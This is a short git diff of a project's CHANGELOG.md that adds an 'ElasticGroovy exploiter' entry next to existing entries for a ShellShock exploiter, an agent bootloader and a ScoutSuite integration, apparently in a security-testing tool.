index 97017beb5..72eadb615 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -46,6 +46,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - Agent bootloader. #1676
 - Zero Trust integration with ScoutSuite. #1669
 - ShellShock exploiter. #1733
+- ElasticGroovy exploiter. #1732
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545